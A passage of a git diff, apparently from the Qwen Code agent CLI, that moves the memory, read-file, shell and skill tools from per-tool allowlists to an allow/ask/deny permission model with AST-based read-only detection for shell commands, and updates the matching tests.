invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join(process.cwd(), 'QWEN.md'); expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (project)`, @@ -376,121 +383,22 @@ describe('MemoryTool', () => { } }); - it('should return false when memory file is already allowlisted for global scope', async () => { + it('should have no-op onConfirm callback', async () => { const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - const invocation = memoryTool.build(params); - // Add the memory file to the allowlist with the scope-specific key format - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.add(`${memoryFilePath}_global`); + const result = await invocation.getConfirmationDetails(mockAbortSignal); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBe(false); - }); - - it('should return false when memory file is already allowlisted for project scope', async () => { - const params = { fact: 'Test fact', scope: 'project' as const }; - const memoryFilePath = path.join( - process.cwd(), - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - // Add the memory file to the allowlist with the scope-specific key format - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.add( - `${memoryFilePath}_project`, - ); - - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBe(false); - }); - - it('should add memory file to allowlist when ProceedAlways is confirmed for global scope', async () => { - const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback - await result.onConfirm(ToolConfirmationOutcome.ProceedAlways); - - // Check that the memory file was added to the allowlist with the scope-specific key format - expect( - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.has( - `${memoryFilePath}_global`, - ), - ).toBe(true); - } - }); - - it('should add memory file to allowlist when ProceedAlways is confirmed for project scope', async () => { - const params = { fact: 'Test fact', scope: 'project' as const }; - const memoryFilePath = path.join( - process.cwd(), - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback - await result.onConfirm(ToolConfirmationOutcome.ProceedAlways); - - // Check that the memory file was added to the allowlist with the scope-specific key format - expect( - // eslint-disable-next-line @typescript-eslint/no-explicit-any - (invocation.constructor as any).allowlist.has( - `${memoryFilePath}_project`, - ), - ).toBe(true); - } - }); - - it('should not add memory file to allowlist when other outcomes are confirmed', async () => { - const params = { fact: 'Test fact', scope: 'global' as const }; - const memoryFilePath = path.join( - os.homedir(), - '.qwen', - getCurrentGeminiMdFilename(), - ); - - const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); - - expect(result).toBeDefined(); - expect(result).not.toBe(false); - - if (result && result.type === 'edit') { - // Simulate the onConfirm callback with different outcomes - await result.onConfirm(ToolConfirmationOutcome.ProceedOnce); - // eslint-disable-next-line @typescript-eslint/no-explicit-any - const allowlist = (invocation.constructor as any).allowlist; - expect(allowlist.has(`${memoryFilePath}_global`)).toBe(false); - - await result.onConfirm(ToolConfirmationOutcome.Cancel); - expect(allowlist.has(`${memoryFilePath}_global`)).toBe(false); + if (result.type === 'edit') { + // onConfirm should be a no-op — just verify it doesn't throw + await expect( + result.onConfirm(ToolConfirmationOutcome.ProceedAlways), + ).resolves.toBeUndefined(); + await expect( + result.onConfirm(ToolConfirmationOutcome.ProceedOnce), + ).resolves.toBeUndefined(); + await expect( + result.onConfirm(ToolConfirmationOutcome.Cancel), + ).resolves.toBeUndefined(); } }); @@ -503,12 +411,14 @@ describe('MemoryTool', () => { vi.mocked(fs.readFile).mockResolvedValue(existingContent); const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const expectedPath = path.join('~', '.qwen', 'QWEN.md'); expect(result.title).toBe( `Confirm Memory Save: ${expectedPath} (global)`, @@ -524,12 +434,14 @@ describe('MemoryTool', () => { it('should prompt for scope selection when scope is not specified', async () => { const params = { fact: 'Test fact' }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { expect(result.title).toContain('Choose Memory Location'); expect(result.title).toContain('GLOBAL'); expect(result.title).toContain('PROJECT'); @@ -546,12 +458,11 @@ describe('MemoryTool', () => { it('should show correct file paths in scope selection prompt', async () => { const params = { fact: 'Test fact' }; const invocation = memoryTool.build(params); - const result = await invocation.shouldConfirmExecute(mockAbortSignal); + const result = await invocation.getConfirmationDetails(mockAbortSignal); expect(result).toBeDefined(); - expect(result).not.toBe(false); - if (result && result.type === 'edit') { + if (result.type === 'edit') { const globalPath = path.join('~', '.qwen', 'QWEN.md'); const projectPath = path.join(process.cwd(), 'QWEN.md'); diff --git a/packages/core/src/tools/memoryTool.ts b/packages/core/src/tools/memoryTool.ts index 95c89b18b..655449068 100644 --- a/packages/core/src/tools/memoryTool.ts +++ b/packages/core/src/tools/memoryTool.ts @@ -4,13 +4,14 @@ * SPDX-License-Identifier: Apache-2.0 */ -import type { ToolEditConfirmationDetails, ToolResult } from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, - Kind, +import type { + ToolEditConfirmationDetails, + ToolResult, + ToolCallConfirmationDetails, ToolConfirmationOutcome, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import type { FunctionDeclaration } from '@google/genai'; import * as fs from 'node:fs/promises'; import * as path from 'node:path'; @@ -207,8 +208,6 @@ class MemoryToolInvocation extends BaseToolInvocation< SaveMemoryParams, ToolResult > { - private static readonly allowlist: Set = new Set(); - getDescription(): string { if (!this.params.scope) { const globalPath = tildeifyPath(getMemoryFilePath('global')); @@ -220,12 +219,21 @@ class MemoryToolInvocation extends BaseToolInvocation< return `${tildeifyPath(memoryFilePath)} (${scope})`; } - override async shouldConfirmExecute( + /** + * Memory save always needs user confirmation. + */ + override async getDefaultPermission(): Promise { + return 'ask'; + } + + /** + * Constructs the memory save confirmation dialog. + */ + override async getConfirmationDetails( _abortSignal: AbortSignal, - ): Promise { + ): Promise { // When scope is not specified, show a choice dialog defaulting to global if (!this.params.scope) { - // Show preview of what would be added to global by default const defaultScope = 'global'; const currentContent = await readMemoryFileContent(defaultScope); const newContent = computeNewContent(currentContent, this.params.fact); @@ -270,14 +278,9 @@ Preview of changes to be made to GLOBAL memory: return confirmationDetails; } - // Only check allowlist when scope is specified + // Scope is specified const scope = this.params.scope; const memoryFilePath = getMemoryFilePath(scope); - const allowlistKey = `${memoryFilePath}_${scope}`; - - if (MemoryToolInvocation.allowlist.has(allowlistKey)) { - return false; - } // Read current content of the memory file const currentContent = await readMemoryFileContent(scope); @@ -303,10 +306,8 @@ Preview of changes to be made to GLOBAL memory: fileDiff, originalContent: currentContent, newContent, - onConfirm: async (outcome: ToolConfirmationOutcome) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - MemoryToolInvocation.allowlist.add(allowlistKey); - } + onConfirm: async (_outcome: ToolConfirmationOutcome) => { + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; diff --git a/packages/core/src/tools/read-file.test.ts b/packages/core/src/tools/read-file.test.ts index ec07a6995..64a46fe9e 100644 --- a/packages/core/src/tools/read-file.test.ts +++ b/packages/core/src/tools/read-file.test.ts @@ -40,10 +40,13 @@ describe('ReadFileTool', () => { getWorkspaceContext: () => createMockWorkspaceContext(tempRootDir), storage: { getProjectTempDir: () => path.join(tempRootDir, '.temp'), - getUserSkillsDir: () => path.join(os.homedir(), '.qwen', 'skills'), + getUserSkillsDirs: () => [path.join(os.homedir(), '.qwen', 'skills')], }, getTruncateToolOutputThreshold: () => 2500, getTruncateToolOutputLines: () => 500, + getContentGeneratorConfig: () => ({ + modalities: { image: true, pdf: true, audio: true, video: true }, + }), } as unknown as Config; tool = new ReadFileTool(mockConfigInstance); }); @@ -73,13 +76,12 @@ describe('ReadFileTool', () => { ); }); - it('should throw error if path is outside root', () => { + it('should allow path outside root (external path support)', () => { const params: ReadFileToolParams = { absolute_path: '/outside/root.txt', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should allow access to files in project temp directory', () => { @@ -91,13 +93,20 @@ describe('ReadFileTool', () => { expect(typeof result).not.toBe('string'); }); - it('should show temp directory in error message when path is outside workspace and temp dir', () => { + it('should allow access to files in OS temp directory', () => { + const params: ReadFileToolParams = { + absolute_path: path.join(os.tmpdir(), 'pr-review-context.md'), + }; + const result = tool.build(params); + expect(typeof result).not.toBe('string'); + }); + + it('should allow path completely outside workspace (external path support)', () => { const params: ReadFileToolParams = { absolute_path: '/completely/outside/path.txt', }; - expect(() => tool.build(params)).toThrow( - /File path must be within one of the workspace directories.*or within the project temp directory/, - ); + const invocation = tool.build(params); + expect(invocation).toBeDefined(); }); it('should throw error if path is empty', () => { @@ -130,6 +139,36 @@ describe('ReadFileTool', () => { }); }); + describe('getDefaultPermission', () => { + it('should return allow for paths within workspace', async () => { + const params: ReadFileToolParams = { + absolute_path: path.join(tempRootDir, 'test.txt'), + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + + it('should return ask for paths outside workspace', async () => { + const params: ReadFileToolParams = { + absolute_path: '/outside/workspace/file.txt', + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + }); + + it('should return allow for paths within temp directory', async () => { + const tempDir = path.join(tempRootDir, '.temp'); + const params: ReadFileToolParams = { + absolute_path: path.join(tempDir, 'temp-file.txt'), + }; + const invocation = tool.build(params); + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('allow'); + }); + }); + describe('getDescription', () => { it('should return relative path without limit/offset', () => { const subDir = path.join(tempRootDir, 'sub', 'dir'); @@ -424,6 +463,28 @@ describe('ReadFileTool', () => { expect(result.returnDisplay).toBe(''); }); + it('should successfully read files from OS temp directory', async () => { + const osTempFile = await fsp.mkdtemp( + path.join(os.tmpdir(), 'read-file-test-'), + ); + const tempFilePath = path.join(osTempFile, 'pr-review-context.md'); + const tempFileContent = '## PR #123\nFix encoding issues'; + await fsp.writeFile(tempFilePath, tempFileContent, 'utf-8'); + + try { + const params: ReadFileToolParams = { absolute_path: tempFilePath }; + const invocation = tool.build(params) as ToolInvocation< + ReadFileToolParams, + ToolResult + >; + + const result = await invocation.execute(abortSignal); + expect(result.llmContent).toBe(tempFileContent); + } finally { + await fsp.rm(osTempFile, { recursive: true, force: true }); + } + }); + describe('with .qwenignore', () => { beforeEach(async () => { await fsp.writeFile( diff --git a/packages/core/src/tools/read-file.ts b/packages/core/src/tools/read-file.ts index e09a1ac58..832e11e0a 100644 --- a/packages/core/src/tools/read-file.ts +++ b/packages/core/src/tools/read-file.ts @@ -4,6 +4,7 @@ * SPDX-License-Identifier: Apache-2.0 */ +import os from 'node:os'; import path from 'node:path'; import { makeRelative, shortenPath } from '../utils/paths.js'; import type { ToolInvocation, ToolLocation, ToolResult } from './tools.js'; @@ -11,6 +12,7 @@ import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { ToolNames, ToolDisplayNames } from './tool-names.js'; import type { PartUnion } from '@google/genai'; +import type { PermissionDecision } from '../permissions/types.js'; import { processSingleFileContent, getSpecificMimeType, @@ -20,7 +22,7 @@ import { FileOperation } from '../telemetry/metrics.js'; import { getProgrammingLanguage } from '../telemetry/telemetry-utils.js'; import { logFileOperation } from '../telemetry/loggers.js'; import { FileOperationEvent } from '../telemetry/types.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths, isSubpath } from '../utils/paths.js'; import { Storage } from '../config/storage.js'; /** @@ -77,6 +79,32 @@ class ReadFileToolInvocation extends BaseToolInvocation< return [{ path: this.params.absolute_path, line: this.params.offset }]; } + /** + * Returns 'ask' for paths outside the workspace/temp/userSkills directories, + * so that external file reads require user confirmation. + */ + override async getDefaultPermission(): Promise { + const filePath = path.resolve(this.params.absolute_path); + const workspaceContext = this.config.getWorkspaceContext(); + const globalTempDir = Storage.getGlobalTempDir(); + const projectTempDir = this.config.storage.getProjectTempDir(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); + const userExtensionsDir = Storage.getUserExtensionsDir(); + const osTempDir = os.tmpdir(); + + if ( + workspaceContext.isPathWithinWorkspace(filePath) || + isSubpath(projectTempDir, filePath) || + isSubpath(globalTempDir, filePath) || + isSubpath(osTempDir, filePath) || + isSubpaths(userSkillsDirs, filePath) || + isSubpath(userExtensionsDir, filePath) + ) { + return 'allow'; + } + return 'ask'; + } + async execute(): Promise { const result = await processSingleFileContent( this.params.absolute_path, @@ -183,26 +211,6 @@ export class ReadFileTool extends BaseDeclarativeTool< return `File path must be absolute, but was relative: ${filePath}. You must provide an absolute path.`; } - const workspaceContext = this.config.getWorkspaceContext(); - const globalTempDir = Storage.getGlobalTempDir(); - const projectTempDir = this.config.storage.getProjectTempDir(); - const userSkillsDir = this.config.storage.getUserSkillsDir(); - const resolvedFilePath = path.resolve(filePath); - const isWithinTempDir = - isSubpath(projectTempDir, resolvedFilePath) || - isSubpath(globalTempDir, resolvedFilePath); - const isWithinUserSkills = isSubpath(userSkillsDir, resolvedFilePath); - - if ( - !workspaceContext.isPathWithinWorkspace(filePath) && - !isWithinTempDir && - !isWithinUserSkills - ) { - const directories = workspaceContext.getDirectories(); - return `File path must be within one of the workspace directories: ${directories.join( - ', ', - )} or within the project temp directory: ${projectTempDir}`; - } if (params.offset !== undefined && params.offset < 0) { return 'Offset must be a non-negative number'; } diff --git a/packages/core/src/tools/shell.test.ts b/packages/core/src/tools/shell.test.ts index d03509451..693b03ec1 100644 --- a/packages/core/src/tools/shell.test.ts +++ b/packages/core/src/tools/shell.test.ts @@ -21,7 +21,6 @@ vi.mock('../services/shellExecutionService.js', () => ({ vi.mock('fs'); vi.mock('os'); vi.mock('crypto'); -vi.mock('../utils/summarizer.js'); import { isCommandAllowed } from '../utils/shell-utils.js'; import { ShellTool } from './shell.js'; @@ -35,9 +34,7 @@ import * as os from 'node:os'; import { EOL } from 'node:os'; import * as path from 'node:path'; import * as crypto from 'node:crypto'; -import * as summarizer from '../utils/summarizer.js'; import { ToolErrorType } from './tool-error.js'; -import { ToolConfirmationOutcome } from './tools.js'; import { OUTPUT_UPDATE_INTERVAL_MS } from './shell.js'; import { createMockWorkspaceContext } from '../test-utils/mockWorkspaceContext.js'; @@ -52,16 +49,18 @@ describe('ShellTool', () => { mockConfig = { getCoreTools: vi.fn().mockReturnValue([]), - getExcludeTools: vi.fn().mockReturnValue([]), + getPermissionsDeny: vi.fn().mockReturnValue([]), getDebugMode: vi.fn().mockReturnValue(false), getTargetDir: vi.fn().mockReturnValue('/test/dir'), - getSummarizeToolOutputConfig: vi.fn().mockReturnValue(undefined), getWorkspaceContext: vi .fn() .mockReturnValue(createMockWorkspaceContext('/test/dir')), storage: { - getUserSkillsDir: vi.fn().mockReturnValue('/test/dir/.qwen/skills'), + getUserSkillsDirs: vi.fn().mockReturnValue(['/test/dir/.qwen/skills']), + getProjectTempDir: vi.fn().mockReturnValue('/tmp/qwen-temp'), }, + getTruncateToolOutputThreshold: vi.fn().mockReturnValue(0), + getTruncateToolOutputLines: vi.fn().mockReturnValue(0), getGeminiClient: vi.fn(), getGitCoAuthor: vi.fn().mockReturnValue({ enabled: true, @@ -94,7 +93,7 @@ describe('ShellTool', () => { describe('isCommandAllowed', () => { it('should allow a command if no restrictions are provided', () => { (mockConfig.getCoreTools as Mock).mockReturnValue(undefined); - (mockConfig.getExcludeTools as Mock).mockReturnValue(undefined); + (mockConfig.getPermissionsDeny as Mock).mockReturnValue(undefined); expect(isCommandAllowed('ls -l', mockConfig).allowed).toBe(true); }); @@ -476,42 +475,6 @@ describe('ShellTool', () => { ).toThrow('Directory must be an absolute path.'); }); - it('should summarize output when configured', async () => { - (mockConfig.getSummarizeToolOutputConfig as Mock).mockReturnValue({ - [shellTool.name]: { tokenBudget: 1000 }, - }); - vi.mocked(summarizer.summarizeToolOutput).mockResolvedValue( - 'summarized output', - ); - - const invocation = shellTool.build({ - command: 'ls', - is_background: false, - }); - const promise = invocation.execute(mockAbortSignal); - resolveExecutionPromise({ - output: 'long output', - rawOutput: Buffer.from('long output'), - exitCode: 0, - signal: null, - error: null, - aborted: false, - pid: 12345, - executionMethod: 'child_process', - }); - - const result = await promise; - - expect(summarizer.summarizeToolOutput).toHaveBeenCalledWith( - expect.any(String), - mockConfig.getGeminiClient(), - expect.any(AbortSignal), - 1000, - ); - expect(result.llmContent).toBe('summarized output'); - expect(result.returnDisplay).toBe('long output'); - }); - it('should clean up the temp file on synchronous execution error', async () => { const error = new Error('sync spawn error'); mockShellExecutionService.mockImplementation(() => { @@ -933,44 +896,57 @@ describe('ShellTool', () => { }); }); - describe('shouldConfirmExecute', () => { + describe('getDefaultPermission and getConfirmationDetails', () => { it('should not request confirmation for read-only commands', async () => { const invocation = shellTool.build({ command: 'ls -la', is_background: false, }); - const confirmation = await invocation.shouldConfirmExecute( - new AbortController().signal, - ); + const permission = await invocation.getDefaultPermission(); - expect(confirmation).toBe(false); + expect(permission).toBe('allow'); }); - it('should request confirmation for a new command and whitelist it on "Always"', async () => { + it('should request confirmation for a non-read-only command and return details', async () => { const params = { command: 'npm install', is_background: false }; const invocation = shellTool.build(params); - const confirmation = await invocation.shouldConfirmExecute( + + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const details = await invocation.getConfirmationDetails( new AbortController().signal, ); + expect(details.type).toBe('exec'); + }); - expect(confirmation).not.toBe(false); - expect(confirmation && confirmation.type).toBe('exec'); - - // eslint-disable-next-line @typescript-eslint/no-explicit-any - await (confirmation as any).onConfirm( - ToolConfirmationOutcome.ProceedAlways, - ); - - // Should now be whitelisted - const secondInvocation = shellTool.build({ - command: 'npm test', + it('should exclude read-only sub-commands from confirmation details in compound commands', async () => { + // "cd" is read-only, "npm run build" is not + const params = { + command: 'cd packages/core && npm run build', is_background: false, - }); - const secondConfirmation = await secondInvocation.shouldConfirmExecute( + }; + const invocation = shellTool.build(params); + + const permission = await invocation.getDefaultPermission(); + expect(permission).toBe('ask'); + + const details = (await invocation.getConfirmationDetails( new AbortController().signal, + )) as { rootCommand: string; permissionRules: string[] }; + + // rootCommand should only include 'npm', not 'cd' + expect(details.rootCommand).not.toContain('cd'); + expect(details.rootCommand).toContain('npm'); + + // permissionRules should not include Bash(cd *) + expect(details.permissionRules).not.toContainEqual( + expect.stringContaining('cd'), + ); + expect(details.permissionRules).toContainEqual( + expect.stringContaining('npm'), ); - expect(secondConfirmation).toBe(false); }); it('should throw an error if validation fails', () => { diff --git a/packages/core/src/tools/shell.ts b/packages/core/src/tools/shell.ts index 01a9ac5cf..3d38eaf4b 100644 --- a/packages/core/src/tools/shell.ts +++ b/packages/core/src/tools/shell.ts @@ -18,15 +18,12 @@ import type { ToolCallConfirmationDetails, ToolExecuteConfirmationDetails, ToolConfirmationPayload, -} from './tools.js'; -import { - BaseDeclarativeTool, - BaseToolInvocation, ToolConfirmationOutcome, - Kind, } from './tools.js'; +import type { PermissionDecision } from '../permissions/types.js'; +import { BaseDeclarativeTool, BaseToolInvocation, Kind } from './tools.js'; import { getErrorMessage } from '../utils/errors.js'; -import { summarizeToolOutput } from '../utils/summarizer.js'; +import { truncateToolOutput } from '../utils/truncation.js'; import type { ShellExecutionConfig, ShellOutputEvent, @@ -34,14 +31,19 @@ import type { import { ShellExecutionService } from '../services/shellExecutionService.js'; import { formatMemoryUsage } from '../utils/formatters.js'; import type { AnsiOutput } from '../utils/terminalSerializer.js'; -import { isSubpath } from '../utils/paths.js'; +import { isSubpaths } from '../utils/paths.js'; import { + getCommandRoot, getCommandRoots, - isCommandAllowed, - isCommandNeedsPermission, + splitCommands, stripShellWrapper, + detectCommandSubstitution, } from '../utils/shell-utils.js'; import { createDebugLogger } from '../utils/debugLogger.js'; +import { + isShellCommandReadOnlyAST, + extractCommandRules, +} from '../utils/shellAstParser.js'; const debugLogger = createDebugLogger('SHELL'); @@ -63,7 +65,6 @@ export class ShellToolInvocation extends BaseToolInvocation< constructor( private readonly config: Config, params: ShellToolParams, - private readonly allowlist: Set, ) { super(params); } @@ -89,36 +90,96 @@ export class ShellToolInvocation extends BaseToolInvocation< return description; } - override async shouldConfirmExecute( - _abortSignal: AbortSignal, - ): Promise { + /** + * AST-based permission check for the shell command. + * - Command substitution → 'deny' (security) + * - Read-only commands (via AST analysis) → 'allow' + * - All other commands → 'ask' + */ + override async getDefaultPermission(): Promise { const command = stripShellWrapper(this.params.command); - const rootCommands = [...new Set(getCommandRoots(command))]; - const commandsToConfirm = rootCommands.filter( - (command) => !this.allowlist.has(command), - ); - if (commandsToConfirm.length === 0) { - return false; // already approved and allowlisted + // Security: command substitution ($(), ``, <(), >()) → deny + if (detectCommandSubstitution(command)) { + return 'deny'; } - const permissionCheck = isCommandNeedsPermission(command); - if (!permissionCheck.requiresPermission) { - return false; + // AST-based read-only detection + try { + const isReadOnly = await isShellCommandReadOnlyAST(command); + if (isReadOnly) { + return 'allow'; + } + } catch (e) { + debugLogger.warn('AST read-only check failed, falling back to ask:', e); + } + + return 'ask'; + } + + /** + * Constructs confirmation dialog details for a shell command that needs + * user approval. For compound commands (e.g. `cd foo && npm run build`), + * sub-commands that are already allowed (read-only) are excluded from both + * the displayed root-command list and the suggested permission rules. + */ + override async getConfirmationDetails( + _abortSignal: AbortSignal, + ): Promise { + const command = stripShellWrapper(this.params.command); + + // Split compound command and filter out already-allowed (read-only) sub-commands + const subCommands = splitCommands(command); + const nonReadOnlySubCommands: string[] = []; + for (const sub of subCommands) { + try { + const isReadOnly = await isShellCommandReadOnlyAST(sub); + if (!isReadOnly) { + nonReadOnlySubCommands.push(sub); + } + } catch { + nonReadOnlySubCommands.push(sub); // conservative: include if check fails + } + } + + // Fallback to all sub-commands if everything was filtered out (shouldn't + // normally happen since getDefaultPermission already returned 'ask'). + const effectiveSubCommands = + nonReadOnlySubCommands.length > 0 ? nonReadOnlySubCommands : subCommands; + + const rootCommands = [ + ...new Set( + effectiveSubCommands + .map((c) => getCommandRoot(c)) + .filter((c): c is string => !!c), + ), + ]; + + // Extract minimum-scope permission rules only for sub-commands that + // actually need confirmation. + let permissionRules: string[] = []; + try { + const allRules: string[] = []; + for (const sub of effectiveSubCommands) { + const rules = await extractCommandRules(sub); + allRules.push(...rules); + } + permissionRules = [...new Set(allRules)].map((rule) => `Bash(${rule})`); + } catch (e) { + debugLogger.warn('Failed to extract command rules:', e); } const confirmationDetails: ToolExecuteConfirmationDetails = { type: 'exec', title: 'Confirm Shell Command', command: this.params.command, - rootCommand: commandsToConfirm.join(', '), + rootCommand: rootCommands.join(', '), + permissionRules, onConfirm: async ( - outcome: ToolConfirmationOutcome, + _outcome: ToolConfirmationOutcome, _payload?: ToolConfirmationPayload, ) => { - if (outcome === ToolConfirmationOutcome.ProceedAlways) { - commandsToConfirm.forEach((command) => this.allowlist.add(command)); - } + // No-op: persistence is handled by coreToolScheduler via PM rules }, }; return confirmationDetails; @@ -378,7 +439,22 @@ export class ShellToolInvocation extends BaseToolInvocation< } } - const summarizeConfig = this.config.getSummarizeToolOutputConfig(); + // Truncate large output and save full content to a temp file. + if (typeof llmContent === 'string') { + const truncatedResult = await truncateToolOutput( + this.config, + ShellTool.Name, + llmContent, + ); + + if (truncatedResult.outputFile) { + llmContent = truncatedResult.content; + returnDisplayMessage += + (returnDisplayMessage ? '\n' : '') + + `Output too long and was saved to: ${truncatedResult.outputFile}`; + } + } + const executionError = result.error ? { error: { @@ -388,20 +464,6 @@ export class ShellToolInvocation extends BaseToolInvocation< } : {}; - if (summarizeConfig && summarizeConfig[ShellTool.Name]) { - const summary = await summarizeToolOutput( - llmContent, - this.config.getGeminiClient(), - signal, - summarizeConfig[ShellTool.Name].tokenBudget, - ); - return { - llmContent: summary, - returnDisplay: returnDisplayMessage, - ...executionError, - }; - } - return { llmContent, returnDisplay: returnDisplayMessage, @@ -541,7 +603,6 @@ export class ShellTool extends BaseDeclarativeTool< ToolResult > { static Name: string = ToolNames.SHELL; - private allowlist: Set = new Set(); constructor(private readonly config: Config) { super( @@ -586,16 +647,9 @@ export class ShellTool extends BaseDeclarativeTool< protected override validateToolParamValues( params: ShellToolParams, ): string | null { - const commandCheck = isCommandAllowed(params.command, this.config); - if (!commandCheck.allowed) { - if (!commandCheck.reason) { - debugLogger.error( - 'Unexpected: isCommandAllowed returned false without a reason', - ); - return `Command is not allowed: ${params.command}`; - } - return commandCheck.reason; - } + // NOTE: Permission checks (command substitution, read-only detection, PM rules) + // are now handled at L3 (getDefaultPermission) and L4 (PM override) in + // coreToolScheduler. This method only performs pure parameter validation. if (!params.command.trim()) { return 'Command cannot be empty.'; } @@ -621,10 +675,10 @@ export class ShellTool extends BaseDeclarativeTool< return 'Directory must be an absolute path.'; } - const userSkillsDir = this.config.storage.getUserSkillsDir(); + const userSkillsDirs = this.config.storage.getUserSkillsDirs(); const resolvedDirectoryPath = path.resolve(params.directory); - const isWithinUserSkills = isSubpath( - userSkillsDir, + const isWithinUserSkills = isSubpaths( + userSkillsDirs, resolvedDirectoryPath, ); if (isWithinUserSkills) { @@ -646,6 +700,6 @@ export class ShellTool extends BaseDeclarativeTool< protected createInvocation( params: ShellToolParams, ): ToolInvocation { - return new ShellToolInvocation(this.config, params, this.allowlist); + return new ShellToolInvocation(this.config, params); } } diff --git a/packages/core/src/tools/skill.test.ts b/packages/core/src/tools/skill.test.ts index 7f327be73..b25e872d0 100644 --- a/packages/core/src/tools/skill.test.ts +++ b/packages/core/src/tools/skill.test.ts @@ -24,7 +24,6 @@ type SkillToolWithProtectedMethods = SkillTool & { returnDisplay: ToolResultDisplay; }>; getDescription: () => string; - shouldConfirmExecute: () => Promise; }; }; @@ -393,9 +392,9 @@ describe('SkillTool', () => { const invocation = ( skillTool as SkillToolWithProtectedMethods ).createInvocation(params); - const shouldConfirm = await invocation.shouldConfirmExecute(); + const permission = await invocation.getDefaultPermission(); - expect(shouldConfirm).toBe(false); + expect(permission).toBe('allow'); }); it('should provide correct description', () => { diff --git a/packages/core/src/tools/skill.ts b/packages/core/src/tools/skill.ts index 68ec7dd55..f64f109de 100644 --- a/packages/core/src/tools/skill.ts +++ b/packages/core/src/tools/skill.ts @@ -20,6 +20,15 @@ export interface SkillParams { skill: string; } +/** + * Builds the LLM-facing content string when a skill body is injected. + * Shared between SkillToolInvocation (runtime) and /context (estimation) + * so that token estimates stay in sync with actual usage. + */ +export function buildSkillLlmContent(baseDir: string, body: string): string { + return `Base directory for this skill: ${baseDir}\nImportant: ALWAYS resolve absolute paths from this base directory when working with skills.\n\n${body}\n`; +} + /** * Skill tool that enables the model to access skill definitions. * The tool dynamically loads available skills and includes them in its description @@ -30,6 +39,7 @@ export class SkillTool extends BaseDeclarativeTool { private skillManager: SkillManager; private availableSkills: SkillConfig[] = []; + private loadedSkillNames: Set = new Set(); constructor(private readonly config: Config) { // Initialize with a basic schema first @@ -176,12 +186,34 @@ ${skillDescriptions} } protected createInvocation(params: SkillParams) { - return new SkillToolInvocation(this.config, this.skillManager, params); + return new SkillToolInvocation( + this.config, + this.skillManager, + params, + (name: string) => this.loadedSkillNames.add(name), + ); } getAvailableSkillNames(): string[] { return this.availableSkills.map((skill) => skill.name); } + + /** + * Returns the set of skill names that have been successfully loaded + * (invoked) during the current session. Used by /context to attribute + * loaded skill body tokens separately from the tool-definition cost. + */ + getLoadedSkillNames(): ReadonlySet { + return this.loadedSkillNames; + } + + /** + * Clears the loaded-skills tracking. Should be called when the session + * is reset (e.g. /clear) so that stale body-token data is not shown. + */ + clearLoadedSkills(): void { + this.loadedSkillNames.clear(); + } } class SkillToolInvocation extends BaseToolInvocation { @@ -189,6 +221,7 @@ class SkillToolInvocation extends BaseToolInvocation { private readonly config: Config, private readonly skillManager: SkillManager, params: SkillParams, + private readonly onSkillLoaded: (name: string) => void, ) { super(params); } @@ -197,11 +230,6 @@ class SkillToolInvocation extends BaseToolInvocation { return `Use skill: "${this.params.skill}"`; } - override async shouldConfirmExecute(): Promise { - // Skill loading is a read-only operation, no confirmation needed - return false; - } - async execute( _signal?: AbortSignal, _updateOutput?: (output: ToolResultDisplay) => void, @@ -245,11 +273,10 @@ class SkillToolInvocation extends BaseToolInvocation { this.config, new SkillLaunchEvent(this.params.skill, true), ); + this.onSkillLoaded(this.params.skill); const baseDir = path.dirname(skill.filePath); - - // Build markdown content for LLM (show base dir, then body) - const llmContent = `Base directory for this skill: ${baseDir}\nImportant: ALWAYS resolve absolute paths 